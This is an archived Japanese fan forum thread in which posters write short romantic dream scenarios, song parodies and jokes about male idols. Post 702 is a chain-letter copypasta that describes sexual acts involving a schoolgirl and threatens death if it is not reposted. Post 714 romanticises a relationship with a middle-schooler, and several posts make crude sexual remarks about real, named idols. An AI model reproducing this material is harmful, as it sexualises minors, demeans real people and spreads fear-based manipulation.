657 :ユーは名無しネ:2006/12/12(火) 00:03:22
>655知ってる自分ってorz

658 :ユーは名無しネ:2006/12/12(火) 05:47:53
今さら怖いとかなしな?
俺もう止めらんねぇから

659 :ユーは名無しネ:2006/12/12(火) 08:34:12
「〇〇!ふにゅ!転んじゃった〜♪」

660 :ユーは名無しネ:2006/12/12(火) 20:07:36
>>658
(・∀・)イイ!!

661 :ユーは名無しネ:2006/12/12(火) 20:38:22
「○○!ふにゅ!うんこ出ちゃった〜♪」

662 :607 がきましたよ:2006/12/16(土) 19:56:28
ドサッツ



663 :ユーは名無しネ:2006/12/16(土) 20:25:03
最後のツは間違いじゃないの?わざと?

664 :ユーは名無しネ:2006/12/16(土) 20:51:57
玉「ドサッツ」

665 :607 がきましたよ:2006/12/17(日) 16:22:14
わざと

666 :ユーは名無しネ:2006/12/17(日) 20:52:28
二千「二千を離しちゃやだおやだおやだお」

667 :ユーは名無しネ:2006/12/22(金) 05:12:01
607

668 :ユーは名無しネ:2006/12/22(金) 05:13:37
>607

669 :ユーは名無しネ:2006/12/22(金) 07:24:45
>668
sageとハイパーを覚えたのはいいが>607がどうしたんだよ教えてくれ

670 :ユーは名無しネ:2006/12/23(土) 01:26:41
オリゴ糖

671 :ユーは名無しネ:2006/12/23(土) 03:46:56
>669
>607が見たかったから&ページめくるの面倒くさかったから(wです(*・_ー)b


672 :薮担 ◆YABUBUMOUY :2006/12/23(土) 18:10:41
エッチしよーよって言われたい

673 :ユーは名無しネ:2006/12/24(日) 02:08:23
自坦の部屋へ遊びに行っているが、本を集中して読んでる自分。
自坦「なぁ、それそんなにおもしろい?」
「んー。・・・」(集中してるのであまり耳に入っていない様子)
自坦「ねぇ、聞いてる?」
「うん・・・」(うろ聞き)
・・・しばらく沈黙

グイッ
いきなり顔を横へ向けられて激しいキス!!

自坦「・・・しよ?」

>627こんな感じ?

674 :ユーは名無しネ:2006/12/24(日) 02:11:58
(´v`)

675 :薮担 ◆YABUBUMOUY :2006/12/24(日) 02:45:46
>>673
まさにそんな感じです!!!!!
想像してにやけちゃったww

676 :ユーは名無しネ:2006/12/24(日) 02:58:04
気に入っていただけたようでよかった

677 :薮担 ◆YABUBUMOUY :2006/12/24(日) 02:59:39
ありがとうございましたぁ*´ω`*

678 :ユーは名無しネ:2006/12/24(日) 07:15:50
>674
(´‘∇‘`)どうしたの?

679 :ユーは名無しネ:2006/12/24(日) 07:33:43
(´‘▽‘`) 口紅塗ってんじゃねよ

680 :ユーは名無しネ:2006/12/24(日) 09:09:19
なんで泣いてるの?虫「いくら頑張っても栗に勝てない…このまま抜かれるしかないのかな?怖いよぉ」

681 :607 がきましたよ:2006/12/24(日) 21:53:22
ドサッツ



682 :607 がきましたよ ◆z2JTMx230M :2006/12/24(日) 21:55:23
ドサッツ

683 :607 がきましたよ ◆z2JTMx230M :2006/12/25(月) 09:01:58
ドサッツだけどなんだろ

話すことないお


684 :ユーは名無しネ:2006/12/25(月) 09:51:33
(´v`)


685 :ユーは名無しネ:2006/12/25(月) 14:49:14
( б_б)虫くんどうしたの?

686 :ユーは名無しネ:2006/12/26(火) 15:39:50
北山『来て…』

687 :ユーは名無しネ:2006/12/28(木) 09:50:01
>684-685
(´‘∇‘`)

688 :ユーは名無しネ:2006/12/28(木) 10:10:37
(´v`)栗のチンカスうんめー

689 :ユーは名無しネ:2006/12/28(木) 10:12:49
光の宝をしゃぶりたい。「全部飲め」って言われたいにゃん

690 :ユーは名無しネ:2006/12/28(木) 10:25:28
>688-689
(´‘∇‘`)基地外?ですねw

Wリョウスケの時代がキタワァ.*・゚゚・*:.。.:*・゚(n‘∀‘) η゚・*:.。..。.:*・゚゚・*!!!!!
って言える日が来るかな?

691 :ユーは名無しネ:2006/12/28(木) 10:28:08
(´v`)栗のもっこりビキニ姿まびー

692 :ユーは名無しネ:2006/12/28(木) 11:01:31
(´‘∇‘`)ぽんぽこ!

693 :NANA:2006/12/28(木) 16:41:59
光に
お前しか見えないんだよっ!!
みたいな感じ??照・・・


694 :ユーは名無しネ:2006/12/28(木) 23:40:56
>693
光「…どしたの?…元気ないじゃん」
「……ちょっと…ぐすっ……不安、で……ぐすっ…」
「…何で?」
「……ファンのコとか、可愛いコいたら…そっち行っちゃわないかな、とか……ぐすっ…いろいろ…」
「…ちょ、っと待ってよ。俺ってそんな信用ない…?」
「そうじゃない…っ。けど光モテるしっ」
「(さえぎって)俺はっ!!」
(突然両肩を掴まれる)
「っ…!?」
「…(じっと見つめて)俺はさぁ、…お前しか見えてないんだよっ!!」
「………」
「俺は…、お前しか好きじゃないから」
(抱きしめられる)
「っ!!……」
「だから、俺のこと信じて?…っていうか、信じろ」

695 :ユーは名無しネ:2006/12/29(金) 08:28:18
今更だが>509
何の歌?

696 :ユーは名無しネ:2006/12/29(金) 08:39:13
>550
(´v`)・・・

>634
ワロタ(wかも

697 :ユーは名無しネ:2006/12/29(金) 11:49:27
(´‘▽‘`)カ-ニバルって歌詞読むとヤリチン男の歌だよね! (´v`)うん
(´‘▽‘`)クリスマスに虫君女の子数人連れてホテルに入って行く所を見たんだよ

Σ(´v`)!?

(´‘▽‘`)リアルカ-ニバルしてたんでしょ

(´v`)………

(´‘▽‘`)俺は家でケ-キカ-ニバルしてたんだ
(´v`)………

(´‘▽‘`)ぽんぽこ!

698 :ユーは名無しネ:2006/12/29(金) 12:05:57
>695
溺愛ロジック

699 :ユーは名無しネ:2007/01/02(火) 00:08:01
「…あんたのほうが非常事態か」

700 :ユーは名無しネ:2007/01/02(火) 01:58:51
虫「ホテル行こうか・・・」
ズコバコ

虫「金置いとくから、じゃあな」

701 :ユーは名無しネ:2007/01/02(火) 03:39:01
虫「♪貴方はどなた〜 名前も知らな〜い いいじゃな〜い」
栗「♪これも何かの〜 縁かも知れ〜ない きっとそうだろう〜」
虫「♪地球最後の日に〜 君はどうする? 恋する?」
栗「♪たわいもない話以外 浮かぶは〜ずがない〜」
虫「♪そろそろどうですか〜?」
栗「♪こっちの準備はOK!」
虫「♪始めましょう カウントダウン〜」
栗「♪そろえて3、2、1!」
虫栗「♪時計の針が〜 12時をさす〜」
虫栗「♪今宵はカーニバル〜 oh! Year!〜」
レオ「♪Wow Wow Wow Wow・・・・」


702 :ユーは名無しネ:2007/01/02(火) 12:32:38
私には、彼氏がいます。彼とわたしは、デートの時、どちらかの家に行き、だれもいないとき
、部屋で横になって裸でだきあいます。それがだんだんエスカレートしていって、学校の体育倉庫で
服をぬがされ、まだ3年生ですが学年で1番大きいおっぱいを、つかむように触られたり、しゃぶった
りされます。最初は、苦手だったんだけどだんだん気持ちよくなりサイコーです。しかも、わたしは
、学年1美人でもてます。彼も同じで、美男美女でよくみんなにうらやましく、思われます。
: : このカキコ見たあなたは4日後に不幸がおとづれ44日後に死にます。それがイヤならコレをコピ
ペして5ケ所にカキコして下さい。私の友達はこれを信じず4日後に親が死にました。44日後友達は
行方不明・・・・。いまだに手がかりもなく私はこのコピペを5ケ所に貼り付けました。すると7日後
に彼氏ができ10日後に大嫌いな人が事故で入院しました。
: :     信じる信じないは勝ってです




703 :ユーは名無しネ:2007/01/02(火) 22:01:17
>701
最後にワロタ(w

704 :ユーは名無しネ:2007/01/02(火) 22:27:40
>701
何の歌?分かる気がするんだが…orz

705 :ユーは名無しネ:2007/01/03(水) 00:25:01
カ-ニバル・ガンニバル

706 :ユーは名無しネ:2007/01/06(土) 14:09:08
虫「小さいね」

707 :ユーは名無しネ:2007/01/06(土) 14:26:26
>116
めっちゃキタ━━━━( ;´∀`)━━━━ !!!
甘い!!!

708 :ユーは名無しネ:2007/01/06(土) 15:06:01
ゑ様「きこくしすぎ(遅刻し過ぎ)」

709 :ユーは名無しネ:2007/01/06(土) 19:01:18
今日は自分の誕生日なのに自担が一番に言った言葉は
自担「ありがとう」
「え?なんでありがとう?」

いきなりぎゅっと抱き締められる

「だってこの日生まれてこなかったら俺と今ここにいないでしょ?
だから生まれてきてくれてありがとう」

710 :ユーは名無しネ:2007/01/07(日) 13:43:18
>708
良い!テラモエスだ
そんな風に叱っていただけるなら自分遅刻しまくりたい

711 :ユーは名無しネ:2007/01/12(金) 04:15:25
「なぁ」
「ん?」
「昼間一緒にメシ食ってたの誰?」
「へ?」
「へ?じゃなくて、誰?」
「……彼氏、だけど…?」
「…ふ〜ん、あっそ!」
「…ちょ、なぜにキレてんの?」
「別にキレてねーし」
「キレてんじゃんっ(w」
「つかさ、いつの間に彼氏とか出来たわけ?」
「…私のことは別にいーでしょっ
〇〇だって彼女いるじゃん」
「…いねぇし」
「は?」
「いねーの!!」
「ちょっとあんた、学校一美人でかわい〜子がいるでしょ?!まさかそれさえ忘れた?(w」
「……れた」
「え?」
「別れた」
「えっ?!なっなんで?」
「別にい〜だろ、何でも」
「何でもって…」
「てか彼氏とはうまくいってんの?」
「…っあ〜、ん〜…」
「やっぱ聞きたくねぇ」
「はぁ?自分から聞いといて…」
「…やなんだけど」
「はい?」
「やなんですけど!」
「なにが?!」
「お前が他の男と一緒にいたりしゃべったり、笑ってたりすんの…やなんだけど」
「……は??…」
「っだからお前が好きだっつってんの!!」
「…っな…////」
「俺のこと好きになれよ」
「………」
「てかぜって〜彼氏より俺のがお前のこと好きだし」
「……ごめん」
「…ごめんって……」
「さっき嘘ついた」
「…嘘?」
「彼氏いるってやつ…嘘」
「はぁっ?!」
「だっだって!なんか悔しかったからついっ…」
「意味わかんね〜んだけど」
「だからごめん…って…」
「あぁ〜〜もうっ!!無駄に嫉妬した分返せっ!!」
「そっそんなこと言われても…!」
「罰として俺と付き合え!!」
「はぁ?」
「好き……だから抱きしめていい?」
「……バカ////」
「ダメ…?」
「…っい、いいに決まってんでしょっ」

712 :ユーは名無しネ:2007/01/12(金) 06:40:18
禿萌
朝からいいモン読ませてもらいました。ありがとう


713 :ユーは名無しネ:2007/01/13(土) 17:39:15
>711
イイ!!!そんな俺様な態度は誰で妄想しようか……

714 :ユーは名無しネ:2007/01/16(火) 12:52:45
「ねぇこないだ好きな人できたって言ってたのって誰のこと?」
「別に誰だっていいじゃん」
「教えろよ」
「関係ないでしょ」
「てゆうか俺でしょ?」
「まさかー!」
「俺なんでしょ?」
「…だから…違うって」
「俺って言ってよ」
「…」
「お願いだから俺のことだけ好きになってよ」
「だって…中学生じゃ犯罪だもん」
「俺は気にしねぇし」
「普通に捕まるもん」
「捕まんねえよ」
「でも…」
「そしたら一緒に逃げればいい。…まだ頼りないかもだけど俺が守ってやるから」

715 :ユーは名無しネ:2007/01/17(水) 04:33:56
「…オレ、お前の最初で最後のオトコになりたい」

716 :ユーは名無しネ:2007/01/18(木) 00:10:20
>714
…捕まるよ

717 :ユーは名無しネ:2007/01/18(木) 00:25:02
ペニバソ渡されて

こいつで突いてくれよ

718 :ユーは名無しネ:2007/01/20(土) 07:35:28
自担に悩みを聞いてもらった設定
「…なんか不思議」
「え?」
「私って、あんまり人にこういうことベラベラ話さないタイプなんだけど、〇〇くんにだと…スラスラ話せちゃう…っていうか…」
「………」
「なんか落ち着くんだよね」
「……ふ〜ん。…俺カウンセラーになろっかなぁ(w」
「あはは(wきっと向いてるよ!
今から心理学の勉強して〜それから、」
「その必要はないよ」
「えっ?」
「お前だけのカウンセラーになるんだから」

719 :ユーは名無しネ:2007/01/20(土) 07:37:11
>718
きんもー☆

720 :ユーは名無しネ:2007/01/20(土) 09:14:51
>>718
朝からテラモヘ

721 :ユーは名無しネ:2007/01/24(水) 10:30:52
ちょ、このスレのお約束マターク守られてないな
あまぁ〜〜くないからなのか(w

722 :ユーは名無しネ:2007/01/27(土) 16:48:03
憎いね

723 :ユーは名無しネ:2007/01/27(土) 17:27:43
栗「おい」
ドサッ
「ぎゅあああああああああああああああああ!!!やめてえええええ!」

栗「いいだろ!な?」ごそごそ
「お願い!駄目っ!やめて」
栗「はっけ〜ん♪」
「それだけは…それだけは!」



栗「お菓子もらってくよ(´‘▽‘`)」

724 :ユーは名無しネ:2007/01/27(土) 17:32:58
あああ!やめて怖いよ!怖いよ…

虫 動くなよ…

ひゃあっ…

虫 よしよし…そのまま…

ひっく…ひっ…く

虫 泣くなよ すぐ楽にしてあげるから

うう…

虫 虫とれたよ

725 :ユーは名無しネ:2007/01/29(月) 20:45:09
担「なぁ、」

「ん?」

「…もし、自分をダチとしか思てへん奴を好きになったらどうする?」

「え、う〜ん…」

「やっぱあきらめたほうがえぇんかなぁ?」

「…なんで、そんなこと聞くん…?」(好きな人おるん…?!)

「………本人に直接、聞いたほうが早いやろ」

726 :ユーは名無しネ:2007/01/29(月) 23:58:51
「お前の体も、心も、名字も、すべてを今すぐ俺だけの物にしたい」

727 :ユーは名無しネ:2007/01/30(火) 14:29:19
自分実は会話形式のやつけっこう好きだったり(w

728 :ユーは名無しネ:2007/01/30(火) 16:20:43
ど〜で〜もい〜いで〜すよ

729 :ユーは名無しネ:2007/01/31(水) 01:41:35
>728
負け組芸人ハケーン

730 :ユーは名無しネ:2007/01/31(水) 23:54:06
ぽんぽんすぽぽんぽんすぽんぽおバカなダンスでピザ集合

731 :ユーは名無しネ:2007/02/01(木) 00:12:51
>727
自分もだ!!
姐さんまた書いてくれないかな

732 :ユーは名無しネ:2007/02/01(木) 21:45:26
俺も滝つ紺つくから安心してね

733 :ユーは名無しネ:2007/02/23(金) 20:55:52
>732
ワロ・・・笑えない
それ馬路で馬路で馬路で言ってホスィ

734 :ユーは名無しネ:2007/02/23(金) 21:57:25
君が思うより僕は君が好き

96 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)